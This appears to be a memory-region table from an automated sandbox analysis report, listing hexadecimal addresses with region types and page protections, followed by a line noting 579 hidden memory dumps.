page read and write
5BE000
stack
page read and write
1C35403C000
heap
page read and write
7FF7BFF50000
trusted library allocation
page read and write
1B5ECD53000
heap
page read and write
1C353AB6000
heap
page read and write
1B5D2A50000
heap
page read and write
7EA0000
trusted library allocation
page read and write
25030000
heap
page read and write
B4E0000
direct allocation
page read and write
1C3540A1000
heap
page read and write
1B5ECBF0000
heap
page read and write
1C3540F3000
heap
page read and write
5C4000
heap
page read and write
1B5D4835000
trusted library allocation
page read and write
1C35204F000
heap
page read and write
722E000
stack
page read and write
B43B000
unclassified section
page execute and read and write
9A4D000
heap
page read and write
1C353F50000
heap
page read and write
5DB5B3F000
stack
page read and write
290E000
stack
page read and write
6B90000
direct allocation
page read and write
2854000
trusted library allocation
page read and write
71EE000
stack
page read and write
1C352071000
heap
page read and write
9A33000
heap
page read and write
6FA3000
heap
page read and write
1C353ABC000
heap
page read and write
1C35205A000
heap
page read and write
1B5ECDDF000
heap
page read and write
7FF7BFF90000
trusted library allocation
page read and write
1C354061000
heap
page read and write
1C353FB9000
heap
page read and write
7E60000
trusted library allocation
page read and write
9A83000
heap
page read and write
6AE0000
direct allocation
page read and write
2853000
trusted library allocation
page execute and read and write
5DB583E000
stack
page read and write
252BD000
stack
page read and write
1B5D2C60000
heap
page read and write
1C353FCF000
heap
page read and write
1C353FE1000
heap
page read and write
1B5D649B000
trusted library allocation
page read and write
5DB51FD000
stack
page read and write
7D47000
stack
page read and write
4780000
heap
page execute and read and write
1C353F51000
heap
page read and write
1C354069000
heap
page read and write
28CB000
heap
page read and write
1C353AC2000
heap
page read and write
1C353F6E000
heap
page read and write
5DB577E000
stack
page read and write
2523E000
stack
page read and write
1B5ECDC4000
heap
page read and write
2540E000
stack
page read and write
8189000
heap
page read and write
1C353FD3000
heap
page read and write
7FF7BFDDC000
trusted library allocation
page execute and read and write
7FF7C0010000
trusted library allocation
page read and write
1B5E4631000
trusted library allocation
page read and write
8727000
remote allocation
page execute and read and write
6C0E000
stack
page read and write
47F2000
trusted library allocation
page read and write
6DF000
stack
page read and write
1C353FE1000
heap
page read and write
1C353F7D000
heap
page read and write
7327000
remote allocation
page execute and read and write
7E90000
trusted library allocation
page read and write
70368F9000
stack
page read and write
255D8000
heap
page read and write
818D000
heap
page read and write
2E6E000
heap
page read and write
8080000
heap
page read and write
9A3E000
heap
page read and write
6CCB000
stack
page read and write
1C354050000
heap
page read and write
1C354061000
heap
page read and write
4127000
remote allocation
page execute and read and write
1B5D2ABA000
heap
page read and write
5527000
remote allocation
page execute and read and write
7E80000
trusted library allocation
page read and write
7036FFC000
stack
page read and write
1B5D51A1000
trusted library allocation
page read and write
6DFE000
stack
page read and write
1B5D4450000
trusted library allocation
page read and write
57B9000
trusted library allocation
page read and write
1C35204F000
heap
page read and write
1C353FE1000
heap
page read and write
803C000
stack
page read and write
1C352094000
heap
page read and write
1B5E4611000
trusted library allocation
page read and write
28C0000
heap
page read and write
1B5ECDAD000
heap
page read and write
2DCE000
stack
page read and write
1C351FB0000
heap
page read and write
9A4D000
heap
page read and write
255D9000
heap
page read and write
24C40000
direct allocation
page read and write
72C0000
trusted library allocation
page read and write
1C3520A2000
heap
page read and write
7048000
trusted library allocation
page read and write
1C351FDA000
heap
page read and write
9A59000
heap
page read and write
7FF7BFF30000
trusted library allocation
page read and write
1C35209D000
heap
page read and write
1C353FD5000
heap
page read and write
25561000
heap
page read and write
9A3E000
heap
page read and write
1C352094000
heap
page read and write
7300000
trusted library allocation
page read and write
24C70000
direct allocation
page read and write
7E1D000
stack
page read and write
45D5000
heap
page execute and read and write
7360000
trusted library allocation
page read and write
255D8000
heap
page read and write
24C20000
direct allocation
page read and write
1B5D4507000
heap
page execute and read and write
1C35204F000
heap
page read and write
2554E000
stack
page read and write
1C353FD0000
heap
page read and write
1C35406D000
heap
page read and write
253CD000
stack
page read and write
9AF0000
heap
page readonly
1B5ECDBE000
heap
page read and write
B4D0000
direct allocation
page read and write
7FF7BFEC0000
trusted library allocation
page read and write
6B00000
direct allocation
page read and write
1C3540A0000
heap
page read and write
1C353F71000
heap
page read and write
7FF7BFF07000
trusted library allocation
page read and write
6C8D000
stack
page read and write
9A5B000
heap
page read and write
1C353FCF000
heap
page read and write
7FF7BFFB0000
trusted library allocation
page read and write
57FE000
trusted library allocation
page read and write
1C352094000
heap
page read and write
1B5D2A70000
heap
page read and write
7FF7BFD22000
trusted library allocation
page read and write
9A42000
heap
page read and write
24C60000
direct allocation
page read and write
1B5D6026000
trusted library allocation
page read and write
80DD000
stack
page read and write
7370000
trusted library allocation
page read and write
7FF7C00B0000
trusted library allocation
page read and write
24CB0000
direct allocation
page read and write
25460000
unclassified section
page execute and read and write
2510E000
stack
page read and write
1B5D2A20000
heap
page read and write
1C352048000
heap
page read and write
790000
heap
page read and write
7EB0000
trusted library allocation
page read and write
1B5D4F9C000
trusted library allocation
page read and write
1C3540A0000
heap
page read and write
1B5D2B02000
heap
page read and write
9A5B000
heap
page read and write
1C353AC2000
heap
page read and write
1B5ECB2F000
heap
page read and write
1C353AC2000
heap
page read and write
1C352085000
heap
page read and write
25560000
heap
page read and write
1C353F89000
heap
page read and write
24C80000
direct allocation
page read and write
807C000
stack
page read and write
7FF7BFFF0000
trusted library allocation
page read and write
1C353FB9000
heap
page read and write
1C353FE1000
heap
page read and write
8430000
direct allocation
page read and write
1C351F80000
heap
page read and write
9DDB000
unclassified section
page execute and read and write
1C35408B000
heap
page read and write
9A4D000
heap
page read and write
7FF7C0000000
trusted library allocation
page read and write
25910000
heap
page read and write
25928000
heap
page read and write
250CF000
stack
page read and write
7FF7C0050000
trusted library allocation
page read and write
1C352085000
heap
page read and write
1C352075000
heap
page read and write
4791000
trusted library allocation
page read and write
4B27000
remote allocation
page execute and read and write
7D70000
trusted library allocation
page read and write
570000
heap
page read and write
72B0000
trusted library allocation
page read and write
5DB5938000
stack
page read and write
7FF7C0040000
trusted library allocation
page read and write
1B5D51B4000
trusted library allocation
page read and write
1B5D4A8C000
trusted library allocation
page read and write
24C00000
direct allocation
page read and write
4628000
heap
page read and write
7FF7BFED1000
trusted library allocation
page read and write
1C3520A2000
heap
page read and write
1C353F98000
heap
page read and write
1C352070000
heap
page read and write
6E60000
heap
page read and write
5C0000
heap
page read and write
1B5D2AB8000
heap
page read and write
1C353AB5000
heap
page read and write
1C353FB9000
heap
page read and write
1C351FD9000
heap
page read and write
592A000
trusted library allocation
page read and write
6F40000
heap
page read and write
BDD7000
direct allocation
page execute and read and write
95D7000
direct allocation
page execute and read and write
1C353FCF000
heap
page read and write
1C352086000
heap
page read and write
461E000
stack
page read and write
1B5D45B0000
heap
page read and write
7FF7BFDE0000
trusted library allocation
page execute and read and write
75D000
stack
page read and write
7FF7BFFA0000
trusted library allocation
page read and write
452E000
stack
page read and write
2DE0000
heap
page read and write
1B5D4D0B000
trusted library allocation
page read and write
7080000
trusted library allocation
page execute and read and write
1C3540A0000
heap
page read and write
6C4D000
stack
page read and write
5DB5BBE000
stack
page read and write
70370FF000
stack
page read and write
1B5D2C90000
heap
page read and write
1C3520A2000
heap
page read and write
7FF7BFD23000
trusted library allocation
page execute and read and write
7FF7BFF20000
trusted library allocation
page read and write
1C353FD5000
heap
page read and write
1C352026000
heap
page read and write
1B5ECCD0000
heap
page execute and read and write
B3D7000
direct allocation
page execute and read and write
6AD0000
direct allocation
page read and write
1C353F89000
heap
page read and write
2EDB000
heap
page read and write
1C352072000
heap
page read and write
9DF0000
heap
page read and write
7FF7BFF70000
trusted library allocation
page read and write
8330000
trusted library allocation
page read and write
2508E000
stack
page read and write
294E000
stack
page read and write
1B5D2B6A000
heap
page read and write
1C352094000
heap
page read and write
99CA000
heap
page read and write
1C35200C000
heap
page read and write
7FF7BFD2D000
trusted library allocation
page execute and read and write
1C352082000
heap
page read and write
5DB660E000
stack
page read and write
9A4D000
heap
page read and write
9DC0000
unclassified section
page execute and read and write
1C354051000
heap
page read and write
5C8000
heap
page read and write
1B5D4C59000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
7D60000
trusted library allocation
page read and write
1B5ECD9A000
heap
page read and write
9A4A000
heap
page read and write
2E14000
heap
page read and write
1C353F88000
heap
page read and write
4BC000
stack
page read and write
70369FE000
stack
page read and write
2869000
trusted library allocation
page read and write
5DB5173000
stack
page read and write
1B5D639D000
trusted library allocation
page read and write
7D27000
remote allocation
page execute and read and write
8420000
direct allocation
page read and write
8410000
trusted library allocation
page execute and read and write
5DB557E000
stack
page read and write
7FF0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page execute and read and write
1B5D44C0000
trusted library allocation
page read and write
7FF7BFE06000
trusted library allocation
page execute and read and write
72AD000
stack
page read and write
1B5ECD69000
heap
page read and write
1C354054000
heap
page read and write
8142000
heap
page read and write
1C352046000
heap
page read and write
7FF7BFD20000
trusted library allocation
page read and write
7FF7BFF80000
trusted library allocation
page read and write
1B5ECD00000
heap
page read and write
1C352000000
heap
page read and write
1C353C00000
heap
page read and write
2518D000
stack
page read and write
9A3E000
heap
page read and write
7F550000
trusted library allocation
page execute and read and write
7350000
trusted library allocation
page read and write
5DB547E000
stack
page read and write
9A3E000
heap
page read and write
6F7E000
heap
page read and write
1B5ECA6B000
heap
page read and write
1C353F7D000
heap
page read and write
1B5D657E000
trusted library allocation
page read and write
9B35000
heap
page read and write
1B5D4607000
heap
page read and write
816C000
heap
page read and write
2830000
trusted library section
page read and write
1B5D518F000
trusted library allocation
page read and write
1B5E4620000
trusted library allocation
page read and write
1C353FCF000
heap
page read and write
2882000
trusted library allocation
page read and write
1C353BE0000
remote allocation
page read and write
1B5ECB36000
heap
page read and write
1C353F8D000
heap
page read and write
24C30000
direct allocation
page read and write
1C351FE0000
heap
page read and write
8191000
heap
page read and write
477B000
stack
page read and write
4F9000
stack
page read and write
5DB567F000
stack
page read and write
1B5D63A1000
trusted library allocation
page read and write
760000
heap
page read and write
2E21000
heap
page read and write
7FF7BFEE0000
trusted library allocation
page execute and read and write
7FF7BFD30000
trusted library allocation
page read and write
25753000
heap
page read and write
6AF0000
direct allocation
page read and write
1C353AB0000
heap
page read and write
6B30000
direct allocation
page read and write
8B10000
direct allocation
page execute and read and write
45D0000
heap
page execute and read and write
1C353F72000
heap
page read and write
1B5D2AFC000
heap
page read and write
2547B000
unclassified section
page execute and read and write
1C352037000
heap
page read and write
8181000
heap
page read and write
1C351FDF000
heap
page read and write
25661000
heap
page read and write
1C353F51000
heap
page read and write
7330000
trusted library allocation
page read and write
1C353FB9000
heap
page read and write
1C354127000
heap
page read and write
1B5D4600000
heap
page read and write
1C352029000
heap
page read and write
2585C000
heap
page read and write
2DEB000
heap
page read and write
29C0000
heap
page read and write
1C352000000
heap
page read and write
2544F000
stack
page read and write
1C353F89000
heap
page read and write
1C353FE1000
heap
page read and write
473D000
stack
page read and write
7FF7BFD24000
trusted library allocation
page read and write
9B30000
heap
page read and write
5F27000
remote allocation
page execute and read and write
1B5D2AB3000
heap
page read and write
1C353F7B000
heap
page read and write
5DB5C3B000
stack
page read and write
1C3520A2000
heap
page read and write
DBD7000
direct allocation
page execute and read and write
1C351FB9000
heap
page read and write
1C353FF4000
heap
page read and write
2550D000
stack
page read and write
456E000
stack
page read and write
1C353AB3000
heap
page read and write
8350000
trusted library allocation
page read and write
1B5D4694000
trusted library allocation
page read and write
1C35205E000
heap
page read and write
7DC0000
trusted library allocation
page read and write
71D000
stack
page read and write
7DF4E9500000
trusted library allocation
page execute and read and write
5DB58B6000
stack
page read and write
6B40000
direct allocation
page read and write
1C3540CE000
heap
page read and write
7FF7BFEF0000
trusted library allocation
page execute and read and write
A9D7000
direct allocation
page execute and read and write
2860000
trusted library allocation
page read and write
7D50000
trusted library allocation
page execute and read and write
1C352072000
heap
page read and write
1B5D4480000
heap
page readonly
6B10000
direct allocation
page read and write
1B5ECDD0000
heap
page read and write
7FF7BFF05000
trusted library allocation
page read and write
1B5D6052000
trusted library allocation
page read and write
5DB57F9000
stack
page read and write
1C352072000
heap
page read and write
24CA0000
direct allocation
page read and write
1C35204F000
heap
page read and write
1C352080000
heap
page read and write
7310000
trusted library allocation
page read and write
4FD000
stack
page read and write
2591E000
heap
page read and write
7340000
trusted library allocation
page read and write
700D000
heap
page read and write
255D9000
heap
page read and write
25660000
heap
page read and write
1C352094000
heap
page read and write
2586D000
heap
page read and write
1C353F77000
heap
page read and write
28A0000
trusted library allocation
page read and write
24C50000
direct allocation
page read and write
4620000
heap
page read and write
7FF7BFDD6000
trusted library allocation
page read and write
7FF7C0020000
trusted library allocation
page read and write
29D0000
trusted library allocation
page read and write
1B5D4520000
trusted library allocation
page read and write
7FF7C0070000
trusted library allocation
page read and write
1C353FCF000
heap
page read and write
1C353BE0000
remote allocation
page read and write
5DB668D000
stack
page read and write
1B5E4910000
trusted library allocation
page read and write
2958000
trusted library allocation
page read and write
1C354068000
heap
page read and write
1C354123000
heap
page read and write
46AE000
stack
page read and write
1B5D4510000
heap
page execute and read and write
2514E000
stack
page read and write
7FF7BFF60000
trusted library allocation
page read and write
1C353FED000
heap
page read and write
2538C000
stack
page read and write
701E000
heap
page read and write
7FF7BFE40000
trusted library allocation
page execute and read and write
1C3520A2000
heap
page read and write
1B5D5BBF000
trusted library allocation
page read and write
70B1000
heap
page read and write
1C35205E000
heap
page read and write
72D0000
trusted library allocation
page read and write
5DB56FE000
stack
page read and write
1B5D2AC2000
heap
page read and write
81C0000
heap
page read and write
9B00000
heap
page read and write
1B5D51BF000
trusted library allocation
page read and write
1B5ECDA5000
heap
page read and write
83ED000
stack
page read and write
6B20000
direct allocation
page read and write
7FF7BFF40000
trusted library allocation
page read and write
6B60000
direct allocation
page read and write
C7D7000
direct allocation
page execute and read and write
8120000
trusted library allocation
page execute and read and write
1C3520A2000
heap
page read and write
1C3522F5000
heap
page read and write
48E7000
trusted library allocation
page read and write
70372FB000
stack
page read and write
1C35209C000
heap
page read and write
1B5D63B8000
trusted library allocation
page read and write
45AE000
stack
page read and write
1C353ABC000
heap
page read and write
1C352072000
heap
page read and write
5DB5ABE000
stack
page read and write
726E000
stack
page read and write
1C353FB9000
heap
page read and write
1B5D2AFE000
heap
page read and write
7036CFF000
stack
page read and write
1C35407A000
heap
page read and write
There are 579 hidden memdumps, click here to show them.